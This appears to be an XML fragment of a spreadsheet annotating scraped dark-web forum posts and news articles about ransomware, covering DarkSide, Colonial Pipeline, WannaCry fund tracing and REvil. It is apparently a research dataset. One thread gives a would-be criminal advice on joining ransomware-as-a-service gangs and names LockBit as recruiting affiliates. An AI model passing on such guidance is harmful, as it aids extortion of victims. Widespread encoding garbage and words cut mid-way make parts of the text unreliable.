cyber ecosystem, learn about adversary capabilities, and, potentially, engage in active counterintelligence efforts to minimize the damage inflicted by the adversary���s cyber operations. practically speaking, defense can never be purely passive or local.;;3-;intrusions have the potential to ee;;;intrusions have an inherent escalatory potential because they can be used to launch multi-stage disruptive strategic attacks on critical civilian infrastructure, promote more potent operations on other targets, and drain the opponent���s counterintelligence resources.;;;previous research studies involving a series of wargames conducted by us civilian policymakers and military personnel concluded that nations were reluctant to launch cyber operations early during a crisis, because they were perceived as extremely provocative, but were unwilling to deploy them later during the middle of warfare, because they seemed less effective in achieving the conflict���s strategic goals.;;;how can hacking be both provocative and ineffective? one convincing answer is that real offensive cyber operations represent an attractive choice in conflicts where opponents would like to avoid escalation and prefer to act below the opponent���s estimated threshold of retaliation, i.e. within the so-called grey zoneen peace and warfare. it has been proven that states compromised by disruptive cyberattacks and/or espionage campaigns have either not reacted, responded with less provocative measures such as economic sanctions, or engaged in one form or another of covert responses.;;;escalation and the cybersecurity dilemma;;;escalation is often avoided, partly because both sides believe that it is strategically better to avoid it, especially that the world wide web itself provides means for them both to compete without escalating into a cyberwar. awareness of the challenges associated with the cybersecurity dilemma promotes avoidance of escalation.;;;the danger of the cybersecurity dilemma stems from the assumption that when escalation has the potential to yield higher stakes, it can produce considerable urgency and fear. on the other hand, high stakes can render ���de-escalation��� an attractive option. it might be strategic to get discovered launching a compromising intrusion, provided that the attacker willsive military advantage in war or will be closer to accomplishing their predefined goals. in such scenario, the victim has an incentive to make concessions and avoid escalation of a war that it has discovered only after being attacked.;;;the core of the cybersecurity dilemma is all about fear and escalation, but this is based more on speculation about misinterpretation of the crisis rather than promoting escalation that turns the cybersecurity dilemma into a more serious political security dilemma.;</t>
  </si>
  <si>
    <t>An article about the dicotomy between implimenting security and provoking cybercrime</t>
  </si>
  <si>
    <t>29/04/2019 04:56</t>
  </si>
  <si>
    <t>67066892ae3b64692411</t>
  </si>
  <si>
    <t>The Cybersecurity dilemma ��� Implementing security vs provoking cyberw</t>
  </si>
  <si>
    <t>darkside hackers have donated crypto to two non-profits, however the charity will be returning the money to the rightful owners.;http://tapeucwutvne7l5o.onion/the-darkside-group-of-cybercriminals-is-donating-money-to-charity</t>
  </si>
  <si>
    <t>Post about the charity that was provided donations by darkside returning the money</t>
  </si>
  <si>
    <t>23/10/2020 14:03</t>
  </si>
  <si>
    <t>abd8d23b83f636f7fab2</t>
  </si>
  <si>
    <t>The DarkSide Group of Cybercriminals Is Donating Money to Charity</t>
  </si>
  <si>
    <t>clearnet: (and shitshow cnn): https://edition.cnn.com/2021/06/07/politics/colonial-pipeline-ransomware-recovered/index.html;;odd timing when the same day the biggest drug-busts europe has seen so far happened with fbi support;;**update** : https://twitter.com/campuscodi/status/1401997966999752706;;includes also the btc adresses;;**update 2** they got the private key to a fucking wallet where the sum was moved wtf</t>
  </si>
  <si>
    <t>Post about the FBI recovering a large amount of the data stolen by the colonal pipeline ransomware attack</t>
  </si>
  <si>
    <t>/u/fohshizzle2</t>
  </si>
  <si>
    <t>9f7ee9aac11908082169</t>
  </si>
  <si>
    <t>The FBI &lt;apparently&gt; recovered big parts of the Colonial Pipeline attack ransomware-money</t>
  </si>
  <si>
    <t>2 days 02:48:00</t>
  </si>
  <si>
    <t>how the fuck did they manage to pull that off? i know darkside has closed shop due to pressure they found themselves under after the pipeline attack. so i doubt they cashed out 4.4 million dollars when they knew all eyes are on that money.</t>
  </si>
  <si>
    <t>this is not the full picture, there is no way dod, fbi and the rest of intelligence sector could have done this with such speed and precision. apparently, darkside lost most of their infrastructure within a day of bidens announcement - like how? there are thousands of possible scenarios to this, but lea being fast and effective ain't a belivable one.</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/;;they made this announcement . but with in 24 hours a new strain was seen in the wild targeting exchanges  its called the epsilon red ransomware . they just did the ol switch-a-roo on the names and kept it moving.</t>
  </si>
  <si>
    <t>/u/favicon</t>
  </si>
  <si>
    <t>well fucking with critical state infrastructure of the #1 global player can move boulders pretty quick;;edit: maybe with "recovered" they have meant the btc they got from fucking their infrastructure earlier and not big parts of the literal ransom-sum. seems to be the most logical conclusion.</t>
  </si>
  <si>
    <t>i can agree on that with you, if we are being honest this is just a tad short of terrorist attack. but what's bugging me is how does one develop a ransomware, gets away with dozen hits (darkside became a serious player in very short time span) and looses most of it's infrastructure in a day. we're talking content delivery, payment and similar servers. either they're retarded, or someone is lying - but we will see in due time.</t>
  </si>
  <si>
    <t>the ransomware was well written, they had a linux version, a windows version, written all in c (some parts in asm too i believe) using os api's.;we can say at least they aren't inexperienced and they're in a group that's most likely why they got away</t>
  </si>
  <si>
    <t>;https://vimeo.com/379765960/a813511f6a;;we will be hearing from coin center, chainalysis, and ciphertrace on the functionality of, and challenges presented by, privacy coins.;;presented by:;jerry brito, coin center;dave jevans, ciphertrace;jacob illum, chainalysis;jason weinstein, steptoe;alan cohn, steptoe;jarek jakubcek, europol;;;partial transcript of the presentation by jarek jakubcek (europol);:;;[;slide;] wannacry 1.0 and 2.0;;i will start with a ransomware investigation some of you may be familiar with, and of course it is wannacry. it was a very popular campaign that started in 2017 and ultimately infected about 400 thousand machines around the world, so we at europol and many other agencies around the world had a good motivation to try to find out who is behind this crime.;;[;slide;] wannacry: btc flow;;long story short on this chart you can see what was happening in terms on crypto tracing. we can see two different wallet linked to wannacry, wannacry 1.0 and wannacry 2.0 in the other corner. in both of these occasions we could see suspect using some interim addresses and then sending funds over to shapeshift. this happened in case of wannacry 1.0, then in case of wannacry 2.0 again suspect directly used the same procedure: he sent funds to a couple of interim addresses, then he sent funds to a consolidation address again from which funds went over to shapeshift. after shapeshift was notified that they are receiving funds from the wannacry campaign they stopped deposits from the 1em7 cluster from the consolidation address and after that point suspect moved the rest of the funds to another exchange changelly. and as a result of movements to these two swapping services funds were converted from bitcoin to an untraceable cryptocurrency monero.;;[;slide;] same story, different visualisation;;the previous slide was produced on chainalysis, this slide is produced on crystal, but i have to say all commercial tracing tools - chainalysis, ciphertrace, elliptic, crystal would get you correct answer. you would be able to find out which exchanges had accepted deposits at the end of the day. good news also is that shapeshift api has a publicly available link that you can use. if you go to shapeshift.io/txstat/&lt;deposit address&gt; you will get positive or negative confirmation saying "yes, this is our deposit address" or "no, this is not our deposit address". apart from that shapeshift will also tell you what happened on their website so in this particular case you can see that almost 2 bitcoin were converted into 126 monero. you get this information immediately without need of contacting shapeshift, and shapeshift actually provides this information for all historic transactions, which is a very good service.;;[;slide;] response from shapeshift;;now the only problem was that when we contacted shapeshift afterwards and asked for more information as you can imagine back in 2017 shapeshift did not really have great kyc in place so everything they were able to provide us were ip logs. so what you see on the screen was the ip log to one of those deposit transactions.;;[;slide;] what can you do with this information?;;of course what we tried to do was to get the ip addresses from the logs and what you see on the screen are five different ip addresses. if you look at these you will immediately notice that something is wrong. these ip addresses do not belong to the same network or subnetwork which is a good indication that the suspect must have been using some proxy. and indeed, after we checked these ip addresses on a publicly available tool called exonerator we discovered that all these addresses were coming from the tor network.;;[;slide;] end of the road;;since the suspect used a combination of tor and [monero], we could not trace the funds. we could not trace the ip addresses. which means we hit the end of the road. whatever happens in the bitcoin blockchain was visible and that is why we were able to get reasonably far. but with monero blockchain, that was the point were the investigation ended. this is a classical example of one of several cases we had where a suspect decides to swap funds from bitcoin or ethereum to monero.</t>
  </si>
  <si>
    <t>Article on the functionallity of privacy coins like bitcoin, include refrences to prominatn ransomware groups</t>
  </si>
  <si>
    <t>/u/Thotbot</t>
  </si>
  <si>
    <t>27/12/2019 13:43</t>
  </si>
  <si>
    <t>1c6ca88f7a28dfea30cb</t>
  </si>
  <si>
    <t>The Functionality of Privacy Coins - Blockchain Alliance on December 10, 2019</t>
  </si>
  <si>
    <t>2 days 17:22:00</t>
  </si>
  <si>
    <t xml:space="preserve">;read this article on deepwebfeed;;a ransomware attack during a pilot program;put travelers��� faces on the dark web.;;in 2018, the federal government started scanning people���s faces as they drove into and out of the country at the anzalduas international bridge, which connects the rio grande valley of texas to mexico. customs and border protection said collecting these biometric images would enhance security and make identifying travelers more efficient. but less than a year later, a data breach compromised 100,000 facial images and 105,000 license plate images. nineteen facial images from the breach were posted to the dark web.;;now, cbp wants to expand facial surveillance beyond anzalduas and other sites that were part of a pilot program, even as the program saw potential security vulnerabilities in at least four airports, according to a report from the department of homeland security inspector general. the expansion will start with facial recognition at more airports and will ultimately scanriving and exiting by land or sea as well, though citizens will be able to opt out. noncitizens who refuse to be photographed could be denied entry.;;last month, multiple civil rights groups filed an objection to the cbp proposal. evan greer, deputy director of the digital rights advocacy nonprofit organization fight for the future, which was among the groups to object to the proposal, said government agencies and the private corporations they work with have a history of failing to safeguard data.;;���if your credit card leaks, you can get a new credit card,��� greer said. ���if your social security number leaks, you can get a new social security number. if a biometric scan of your face leaks, you can���t get a new face. the security risks associated with collecting huge numbers of people���s biometric information, storing it in these databases so that they can run scans and checks against it, frankly threatens security and safety at airports rather than increases it.���;;ir cbp granted perceptics, a subcontractor, access to the computer system containing photos of drivers and passengers. although perceptics had access only for the purpose of performing maintenance on cameras and other related equipment, it also downloaded images from cbp���s system. the agency hadn���t given permission for the images to be downloaded, but a report by the department of homeland security inspector general found that cbp also hadn���t fulfilled its it security responsibilities to prevent a download.;;the images, saved to a usb hard drive and transported to perceptics��� corporate office in knoxville, tennessee, were then uploaded to the company���s server. later, a ransomware attack hit perceptics��� corporate network. perceptics was briefly suspended from further contracts with the federal government, but the suspension was lifted just a few months later.;;while the federal government has collected biometric data for years, including fingerprints from noncitizrated significant racial and gender bias.;;���those mugshot databases are disproportionately filled with faces of black men because of our country���s decades-long history with the criminal justice system,��� greer said. ���those watch lists are disproportionately following the faces of muslim men because of our country���s decades-long legacy of criminalizing muslims and politically active muslims.���;;a study by the national institute of standards and technology looked at 189 software algorithms and found high rates of false positives when matching photos of asians, african americans, and native groups. another study by mit and stanford looked at three programs that produced an error rate of less than 1 percent for light-skinned men but at least 20 percent for dark-skinned women.;;guadalupe correa-cabrera, an associate professor at george mason university who specializes in mexico-us relations, also worries about the accuracy of the technology. while living in brownsville of technology employed by cbp as she regularly crossed the border. facial surveillance acts as a ���virtual wall,��� she said, combining with tools such as drones, sensors, and radars.;;���you have less freedom of movement because the government is going to know where you���re at,��� she said. ���and if you become a political target, this is going to make your life very, very difficult.��� noting the inaccuracy of facial recognition technology, along with evidence of its use at protests and rallies, a bill in the senate proposes a moratorium on government use of the technology until a commission can set guidelines.;;as cbp eyes facial surveillance as the future of security checks, companies are keen on meeting demand. from 2017 to 2019, cbp spent $228 million on the facial recognition pilot programs. since then, cbp has cited the pandemic as further evidence for the need for facial surveillance, arguing that it lessens contact during travel.;;���one of the mosteing tech vendors sort of shamelessly exploiting the pandemic to peddle this software,��� greer said. ���suddenly, they rebranded overnight as ���facial recognition: the touchless software that will keep you safe from the virus.��� that is not a claim that is supported by any public health guidance or experts.���;;greer worries that the pandemic will lead travelers to accept greater surveillance since they���re primarily concerned with avoiding the coronavirus. ���people are desperate to start traveling again and feel safe while they do it,��� greer said. ���so it creates this sort of dangerous, perfect storm where i worry people will accept what they see as a sort of acceptable expansion of surveillance to quote-unquote ���keep people safe��� </t>
  </si>
  <si>
    <t>An article about how a previous ransomware attack gained access to people facial data after the airport was storing this when passengers arrived</t>
  </si>
  <si>
    <t>cae10163004efd4fbc9f</t>
  </si>
  <si>
    <t>The Government Wants to Scan Your Face When You Enter the US. It Hasn���t Gone Well S</t>
  </si>
  <si>
    <t>was curious if there is such a place on the dark web that is similar to indeed. more specifically, a website that hackers could potentially submit their resume to join ransomware gangs or other hacker groups?</t>
  </si>
  <si>
    <t>request for ransomware gang recruting platform</t>
  </si>
  <si>
    <t>3225fdd0de1f2a9d3131</t>
  </si>
  <si>
    <t>The Indeed of the Darkweb</t>
  </si>
  <si>
    <t>0 days 19:45:00</t>
  </si>
  <si>
    <t>due to the recent ban on all ransomware topics on xss and exploit, most of the raas gangs went private or set up their own tor sites. they used to have advertisements and applications threads on said forums but not anymore due to the colonial incident. is there a specific raas you'd like to join?</t>
  </si>
  <si>
    <t>request for ransomware gang recruting platform - mentioning that ransomware gangs have gone private in recrutment due to bans on forums</t>
  </si>
  <si>
    <t>{'ransomware': 1, 'raas': 2}</t>
  </si>
  <si>
    <t>i was interested in revil but i understand its not that easy to just "apply". i was more just curious. i was hoping to find something that could possibly get me an understanding of how one would be able to establish a career in hacking on the dark web. thanks for the info!! that makes sense that many have gone to a private method due to the recent ransomware bans on forums.</t>
  </si>
  <si>
    <t>in soviet russia, ransomeware finds you.</t>
  </si>
  <si>
    <t>going for the top dog huh? won't be that easy, for revil you'll need to know some actors together with vouches and a sophisticated set of skills. considering raas, you'll be asked about your previous experience on the interviews like countries, regions, specific amounts, and corps as your trophies. some big gangs are also quite open towards recruiting affiliates.;;remember that if you have advanced skills in pentesting, moving through a network laterally, spamming or spear-phishing - a raas is just a name pretty much. they all employ advanced lockers and you can honestly find stand-alone ransomware of equal quality in the wild. all you get when joining a raas is a set of basic instructions and a crypted/packed binary. they will also take care of the negotiation/communication process together with the payment but those are secondary functions.;;the key in ransomware is being able to breach a network.</t>
  </si>
  <si>
    <t>{'ransomware': 2, 'revil': 1, 'raas': 2}</t>
  </si>
  <si>
    <t>yes! it's definitely a long term goal (revil) and i really appreciate you explaining how this process works. i will try to find a raas group and see if i can work my way up from there. any direction on where to find small groups to help get my feet wet?</t>
  </si>
  <si>
    <t>his application went from 0 to 100 real fast. mf went straight for sodinokibi like he was applying for a fucking job at walmart.</t>
  </si>
  <si>
    <t>{'sodinokibi': 1}</t>
  </si>
  <si>
    <t>i mean if he were as good as you would need to be in order to even be considered as candidate for their raas service. you woudln't need them in the first place. but, i wish my man all the best.</t>
  </si>
  <si>
    <t>lockbit is looking for affiliates on their onion site but it seems others are having issues contacting them -;/post/d9f75da95e29c9ff28b6;/</t>
  </si>
  <si>
    <t>the russian government has been accused of supporting ransomware attacks aimed at foreign countries;;http://tape-news.net/the-kremlin-provides-a-safe-harbor-for-ransomware</t>
  </si>
  <si>
    <t>Post stating the russian goverment has been accused of suporting ransomware attacks</t>
  </si>
  <si>
    <t>15/05/2021 12:03</t>
  </si>
  <si>
    <t>78dd6044338c720d134d</t>
  </si>
  <si>
    <t>The Kremlin Provides a Safe Harbor for Ransomware</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the rise of professional criminal gangs, malware as a service, and improved infrastructure for carrying out criminal activity are changing the dark web. here's what that means for enterprise security.;;lately, dark web actors have one more worry: getting caught by law enforcement. tracking dark web illegal activities has been a cat-and-mouse game for authorities, but in the end, they often catch their adversaries and seize the dodgy money. on the night of the 2020 presidential election, for example, us government officials managed to empty out a $1 billion bitcoin wallet recovering funds linked to silk road, seven years after the market���s closure. silk road was a popular underground marketplace dealing in illegal goods and services such as narcotics, hacking for hire, and contract killing.;;;cybercriminal group closure and exit scams;;events like these have compelled cybercriminals to plot new strategies, which sometimes involves closing shop and cashing out before tt on the feds��� radar. in october 2020, the maze ransomware group, which has breached hundreds of companies including xerox, lg, and canon, shut itself down over a six-week period stating they had retired their activities. however, experts have suggested this is likely a fa��ade. ransomware operators often shut one operation down to join another rather than exit the business completely.;;���in recent years, the dark net has dramatically changed, quite organically, due to increased organized criminal organizations��� use of anonymous forums and marketplaces, the increased presence of young youtube inspired 'criminal wannabes,' and naturally, the subsequent increased presence of law enforcement and their attempts to infiltrate, de-anonymize, and take down such groups and hidden services,��� says mark turnage, ceo of darkowl, a dark web search engine.;;;dark web becoming a recruiting channel;;according to turnage, the dark web has evolved into an intermediary ground where cybercriminach new members for their group. they then move communications to private, encrypted channels such as telegram, jabber, and wickr. ���malware developers and financial fraud [criminals] rely less on dark net marketplaces for distributing their exploits and instead levy black hat forums across the deep web and darknet to establish their brand, develop clout across the community, and recruit new members,��� says turnage. ���many criminal organizations use the dark net merely to vet potential affiliates, particularly in the ransomware-as-a-service industry, and their [co-conspirators].���;;turnage says that darkowl has seen more technically savvy criminals increase their use of alternative decentralized dark nets and meshnets such as lokinet and yggdrasil. he attributes this to the short lifespan of dark net marketplaces and services across tor and server seizures by globally coordinated law enforcement agencies.;;moving marketplaces from tor nodes to private messaging services may also coages, such as distributed denial of service (ddos) protections. these technical safeguards may lure dark web admins as underground marketplaces like empire have been forced to shut themselves down following ddos attacks by other cybercriminals in rather ironic extortion attempts. empire���s abrupt exit has also rendered its so-called ���escrow��� guarantee void, prompting some patrons to label the closure an ���exit scam.���;;by switching patrons over to legitimate end-to-end encrypted messaging services, cybercriminals leverage the reliable distributed infrastructure of these platforms while remaining discreet and avoiding the scrutiny of law enforcement. granted, messaging platforms like telegram may not be entirely immune from ddos attacks, protecting against such attacks then becomes the responsibility of platform owners rather than dark web ops.;;;leveraging underground chatter for intel gathering;;according to raveed laeb, product manager at kela, the dark web of today repr and services. although traditionally concentrated in forums, dark web communications and transactions have moved to different mediums including im platforms, automated shops, and closed communities. threat actors are sharing covert intelligence on compromised networks, stolen data, leaked databases and other monetizable cybercrime products through these mediums.;;���the market shifts are focused on automation and servitization [subscription models], aimed at aiding the cybercrime business to grow at scale,��� says laeb. ���as can be witnessed by the exponential rise of ransomware attacks leveraging the underground financial ecosystem, the cybercriminal-to-cybercriminal markets allow actors to seamlessly create a supply chain that supports decentralized and effective cybercrime intrusions���giving attackers an inherent edge.���;;on the bright side, security professionals and threat analysts can tap into this intel to identify and patch system weaknesses before threat actors can eexploit these robust and dynamic ecosystems by gaining visibility into the inner workings of the underground ecosystem���allowing them to trace the same vulnerabilities, exposures, and compromises that would be leveraged by threat actors and remediate them before they get exploited,��� says laeb.;;this can be done by monitoring forums and darknet sites where threat actors are most likely to lurk, discuss upcoming threats, and put exploits up for sale. a hacker recently posted exploits for over 49,000 vulnerable fortinet vpns on a forum, for example, some of which belonged to prominent telecoms, banks and government organizations. this was followed by a second forum post in which another threat actor exposed plaintext credentials for all the vpn devices for any adversary to exploit. although the vulnerability in question is a two-year-old path-traversal bug, likely not on anyone���s radar anymore, thousands of corporate vpns present on the list remained vulnerable to this critical issue.;;tapums and monitoring for such intel can give heads up to security teams at organizations to do their due diligence in where adversaries may be headed next.;;;tracking illicit activity disguised under legitimate programs;;advanced persistent threat (apt) groups are now using the dark web to gather knowledge of their targets and then use legitimate network protocols and programs for covert data exfiltration purposes. ���in the past, organizations tended to only be concerned about their own data appearing on the dark web, and even then, it would only ring alarm bells if significant data were located. however, many of the chinese and russian nation-state backed advanced persistent threat groups are now using the dark net to perform reconnaissance of potential targets, and then provide a cover for exfiltrating data,��� says vince warrington, ceo at dark intelligence.;;���since the start of 2020, the use of ssh by these apt groups has increased by over 200%. our research indicated that apt groups arrt 22 to infiltrate organizations unnoticed and, once inside, are using poorly monitored and maintained systems���especially industrial control systems���to steal significant amounts of data. several recent attacks are alleged to have stolen over 1 terabyte of data from individual businesses, a huge amount that organizations are failing to spot because they are unable to monitor effectively for dark net connections,��� says warrington.;;this point has been substantiated by the discovery last month of the massive solarwinds supply chain attack attributed to the russian espionage group apt29, a.k.a. cozy bear. by exploiting trust within a legitimate program like solarwinds orion and its secure update channels (or protocols), sophisticated attackers managed to silently breach over 18,000 of the 300,000 solarwinds customers and remained undetected for months. their sinister activities conducted as a part of this attack could have involved covert surveillance and data exfiltration leaving no obvis different from cases where threat actors make noise on public or dark web forums when leaking data dumps. so, monitoring the dark web alone for signs of data exfiltration isn���t enough.;;threat analysts and security researchers are therefore encouraged to reevaluate their monitoring strategies. rather than focusing solely on detecting anomalies within corporate networks, such as foreign ips and odd port numbers, or waiting for proprietary data to appear on the dark web, it is worth monitoring trustworthy programs and services, including their security updates, and your organization���s software supply chains where threat actors could be hidin</t>
  </si>
  <si>
    <t>Post about how the rise in professional gangs and raas providers is changing the dark web</t>
  </si>
  <si>
    <t>85944eb85b8ed07dc5d8</t>
  </si>
  <si>
    <t>The State of The Dark Web: Insights from The Underground</t>
  </si>
  <si>
    <t>the u.s. department of justice has announced that all ransomware incidents will now be treated as terrorism, being assigned with the ultimate level of investigatory effort in an attempt to curb the problem and reduce the number and severity of the attacks. in practice, this means any ransomware investigation across the u.s. will be handled and coordinated from a special task force in washington, which will attempt to make connections and correlations between actors and attacks.;;in the case that any hackers are arrested, they will face charges of terrorism ��� which is a class c felony punishable by up to 10 years of imprisonment, on top of the usual computer fraud act violations and unauthorized access that incur their own punishments. the authorities hope that this alone would be a deterrent for the actors. still, the truth is, not many of those ransomware hackers are ever identified, let alone arrested and prosecuted.;;in a recent interview with a russian channel, revil stated that getting classifiedrrorists doesn���t mean anything to them, nor will it affect their operations. the notorious group of actors also pointed out that if the u.s. moves forward with this new legislation, it will only restrict victims from paying the ransoms quickly and getting back to business, so it will only make the effects of the ransomware attack worse.;;this is, of course, a different view from what the americans are hoping to achieve with the new approach, and how the landscape will shape depends on the dynamics that���ll come into play. if ransomware payments are treated as terrorist financing, some countries will face international consequences for paying ransom to actors. also, if american firms don���t pay, hackers will gradually stop hitting them.;;dirk schrader, vice president at new net technologies tells us:;;for now, this is more about collecting and centralizing information. additional steps should be focused around a requirement to report any case of ransomware to authorities, strongly discourof a ransom. companies might not be willing to report a ransomware incident if that reporting will delay the resolution, will delay the return to normal operation due to investigations being slow, and will be time and resource consuming.;;clearly, this is not a one-side coin, and there are opposing factors that are bound to affect the result. some believe it���s a solid step in the right direction, and others think it will just make matters worse. for the u.s. law enforcement authorities, it is a response to a situation that has been out of control for way too long now, and responding with something is far better than doing nothing. if the system is evaluated as inadequate or negative, the u.s. state thinks they will at least have a basis to build upon and develop a better app</t>
  </si>
  <si>
    <t>US goverment will now treat ransomware attacks as terrorism</t>
  </si>
  <si>
    <t>0f68633da95ec9342f59</t>
  </si>
  <si>
    <t>The U.S. To Treat Ransomware Attacks As Terrorism</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 7}</t>
  </si>
  <si>
    <t>;;the u.s. to treat ransomware attacks as terrorism;;by;/u/strawberrypopstickle;���;1 year ago;in;/d/deepwebmarkets;;1 points;���;</t>
  </si>
  <si>
    <t>fd2199ba4a1cf3c131f3</t>
  </si>
  <si>
    <t>0 days 01:51:00</t>
  </si>
  <si>
    <t>the us government is seeking to have two members of a dark web fraud gang extradited from the united kingdom where they are being held. the two are believed to be the administrators of a dark web forum which has been primarily involved in the sale of stolen credit cards and other personal credentials on the dark web for bitcoins.;;according to the investigating detectives, the two cybercriminals are members of a 36-dark web criminal gang which has been operating using different names including ���moneymafia��� and ���infrared���. the dark web gang has been linked to an over ��409 million ($530m) loss by individuals and banks globally.;;the demand for cybercrime ware products on dark web marketplaces has continuously increased in the recent past. according to research conducted in april this year, over 41 percent of merchandise sold on the dark web involved stolen credentials, hacking tools, email addresses, malware, and counterfeit documents. the demand has been attached to the vale use of such credentials. most are used in fraud and malware for ransomware and ddos kits.;;anthony okeakpu nnamdi and taimoor zaman are facing charges for fraud, the theft of personal items, impersonation, and money laundering. the two have since denied the allegations. according to the documents filed at the westminster magistrates��� court, the two suspects would interfere with the investigation, which is still underway, as they are both senior members of the dark web criminal gang. the ���lnfraud��� gang had been operating for years and is known for the slogan, ���in fraud we trust.���;;during the hearing, the lawyer representing the us government revealed that taimoor zaman had been a salesperson, an administrator, and a moderator of the dark web forum where he had been using the nickname, scottish. he also said that zaman had posted more than 250 times on the dark web forum, advertising for stolen credit card numbers, ids, social security numbers, and drivers licenses amon;according to the barrister, zaman was in the run. he had left italy after he discovered that the law enforcers there were tracking his moves and traveled to the united kingdom where he was arrested at blackburn, lancashire in a house on february 9.;;anthony okeakpu nnamdi, a full-time college student in london, is also accused of providing customer services on the dark web forum. he is said to be a part-time moderator and administrator operating under the nickname moneymafia1, helping customers to place their orders on the dark web market. he was arrested on february 14 this year at heathrow airport after returning from nigeria. the police obtained a search warrant from the westminster magistrates��� court which they executed and subsequently recovered a computer from his residential home.;;the us government���s lawyer said if the two suspects were extradited they might have to wait until next year, or at the latest in 2020, to face trial.;;the two are expected to appear at the westminster magistrt again at a later date during the hearing for the application filed by the us government to have the two extradited.</t>
  </si>
  <si>
    <t>post about the us wishing to extradite two members of a notable ransomware gang</t>
  </si>
  <si>
    <t>f133efebe289f79c35a2</t>
  </si>
  <si>
    <t>The US Seeks to Have Two Members of ���MoneyMafia��� Dark Web Gan</t>
  </si>
  <si>
    <t>670fe68f680ef1deadc0</t>
  </si>
  <si>
    <t>6 days 18:53:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;if it were measured as a country, cybercrime ��� which is predicted to inflict damages totaling $6 trillion globally in 2021 ��� would be the world���s third-largest economy after the u.s. and china. cybersecurity ventures expects global cybercrime costs to grow by 15 percent per year over the next five years, reaching $10.5 trillion usd annually by 2025, up from $3 trillion in 2015.;;this represents the greatest transfer of economic wealth in history, risks the incentives for innovation and investment, is exponentially larger than the damage inflicted from natural disasters in a year, and will be more profitable than the global trade of all major illegal drugs combined.;;the damage cost estimation is based on historical cybercrime figures, including recent year-over-year growth, a dramatic increase in hostile nation-state sponsored and organized-crime hacking activities, and a cyberattack surface which will be an order of magnitude greater in 2025 than it ime costs include damage and destruction of data, stolen money, lost productivity, theft of intellectual property, theft of personal and financial data, embezzlement, fraud, post-attack disruption to the normal course of business, forensic investigation, restoration and deletion of hacked data and systems, and reputational harm. the u.s., the world���s largest economy with a nominal gdp of nearly $21.5 trillion, constitutes one-fourth of the world economy, according to data from nasdaq.;;cybercrime has already hit the u.s. so hard that in 2018 a supervisory special agent with the fbi who investigates cyber intrusions told the wall street journal that every american citizen should expect that all of their data (personally identifiable information) has been stolen and is on the dark web ��� a part of the deep web ��� which is intentionally hidden and used to conceal and promote heinous activities.;;some estimates put the size of the deep web (which is not indexed or accessible by search engine,000 times larger than the surface web, and growing at a rate that defies quantification. the dark web is also where cybercriminals buy and sell malware, exploit kits, and cyberattack services, which they use to strike victims ��� including businesses, governments, utilities, and essential service providers on u.s. soil.;;a cyberattack could potentially disable the economy of a city, state or our entire country. in his 2016 new york times bestseller ��� lights out: a cyberattack, a nation unprepared, surviving the aftermath ��� ted koppel reveals that a major cyberattack on america���s power grid is not only possible but likely, that it would be devastating, and that the u.s. is shockingly unprepared.;;billionaire businessman and philanthropist warren buffet calls cybercrime the number one problem with mankind, and cyberattacks a bigger threat to humanity than nuclear weapons. a bullseye is squarely on our nation���s businesses. ���cybercriminals know they can hold businesshrough breaches, ransomware, denial of service attacks and more,��� says jack b. blount, president and ceo at intrusion, inc..;;���this is cyberwarfare, and we need to shift our mindset around cybersecurity in order to protect against it.��� organized cybercrime entities are joining forces, and their likelihood of detection and prosecution is estimated to be as low as 0.05 percent in the u.s., according to the world economic forum���s 2020 global risk report.;;���every american organization ��� in the public and private sector ��� has been or will be hacked, is infected with malware, and is a target of hostile nation-state cyber intruders,��� adds blount, who is also the former cio at the united states department of agriculture. blount���s assertion is backed up by some of the nation���s top cyber defense experts and fortune 500 chief information security officers (cisos) in a roundtable discussion which recently aired on the cybercrime radio podcastware ��� a malware that infects computers (and mobile devices) and restricts their access to files, often threatening permanent data destruction unless a ransom is paid ��� has reached epidemic proportions globally and is the ���go-to method of attack��� for cybercriminals.;;a 2017 report from cybersecurity ventures predicted ransomware damages would cost the world $5 billion in 2017, up from $325 million in 2015 ��� a 15-fold increase in just two years. the damages for 2018 were estimated at $8 billion, and for 2019 the figure rose to $11.5 billion.;;the latest forecast is for global ransomware damage costs to reach $20 billion by 2021 ��� which is 57 times more than it was in 2015. we predict there will be a ransomware attack on businesses every 11 seconds by 2021, up from every 40 seconds in 2016.;;the fbi is particularly concerned with ransomware hitting healthcare providers, hospitals, 911 and first responders. these types of cyberattacks can impact the physical safetyhe forefront of what herb stapleton, fbi cyber division section chief, and his team are focused on.;;last month, ransomware claimed its first life. german authorities reported a ransomware attack caused the failure of it systems at a major hospital in duesseldorf, and a woman who needed urgent admission died after she had to be taken to another city for treatment.;;ransomware, now the fastest growing and one of the most damaging types of cybercrime, will ultimately convince senior executives to take the cyber threat more seriously, according to mark montgomery, executive director at the u.s. cyberspace solarium commission (csc) ��� but he hopes it doesn���t come to that.;;;the evolution of hacking;;the modern definition of the word ���hack��� was coined at mit in april 1955. the first known mention of computer (phone) hacking occurred in a 1963 issue of the tech. over the past 50-plus years, the world���s attack surface has evolved from phone systems to a vast datasphere outpacinre it.;;in 2013, ibm said data promises to be for the 21st century what steam power was for the 18th, electricity for the 19th and hydrocarbons for the 20th. ���we believe that data is the phenomenon of our time,��� said ginni rometty, ibm corp.���s executive chairman, in 2015, addressing ceos, cios and cisos from 123 companies in 24 industries at a conference in new york city.;;���it is the world���s new natural resource. it is the new basis of competitive advantage, and it is transforming every profession and industry. if all of this is true ��� even inevitable ��� then cyber crime, by definition, is the greatest threat to every profession, every industry, every company in the world.���;;the world will store 200 zettabytes of data by 2025, according to cybersecurity ventures. this includes data stored on private and public it infrastructures, on utility infrastructures, on private and public cloud data centers, on personal computing devices ��� pcs, lapt-of-things) devices.;;;pandemic creates security ���blind spots���;;as a result of the covid-19 pandemic, nearly half the u.s. labor force is working from home, according to stanford university. as employees generate, access, and share more data remotely through cloud apps, the number of security blind spots balloons.;;it���s predicted that the total amount of data stored in the cloud ��� which includes public clouds operated by vendors and social media companies (think apple, facebook, google, microsoft, twitter, etc.), government-owned clouds that are accessible to citizens and businesses, private clouds owned by mid-to-large-sized corporations, and cloud storage providers ��� will reach 100 zettabytes by 2025.;;that represents 50 percent of the world���s data at that time, up from approximately 25 percent stored in the cloud in 2015...;(character limit reached, read the r</t>
  </si>
  <si>
    <t>Posts about the increased finacial impact on the global world cybercrime is having (this includes ransomware posts)</t>
  </si>
  <si>
    <t xml:space="preserve">news </t>
  </si>
  <si>
